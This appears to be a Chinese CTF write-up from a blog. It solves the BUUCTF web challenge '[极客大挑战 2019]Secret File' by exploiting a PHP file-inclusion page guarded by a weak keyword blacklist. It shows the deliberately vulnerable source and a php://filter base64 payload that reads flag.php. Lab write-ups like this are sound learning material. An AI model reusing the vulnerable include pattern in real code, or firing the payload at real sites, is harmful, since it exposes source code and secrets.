buuctf-web-[极客大挑战 2019]Secret File-wp

[极客大挑战 2019]Secret File

知识点

  • php://filter 伪协议文件包含读取源代码,加上read=convert.base64-encode,用base64编码输出,不然会直接当做php代码执行,看不到源代码内容。

过程

源代码出现Archive_room.php,点击跳转到这个页面

再点select继续跳转到这个页面,查看源代码没发现什么特别的

使用burpsuite抓下包

发现secr3t.php,访问得到源码

<html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>
</html>

可以看到是文件包含,传入一个get型参数file,首先判断if语句中不允许存在../tpdata

?file=php://filter/read=convert.base64-encode/resource=flag.php

得到加密后内容,解码得到flag

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值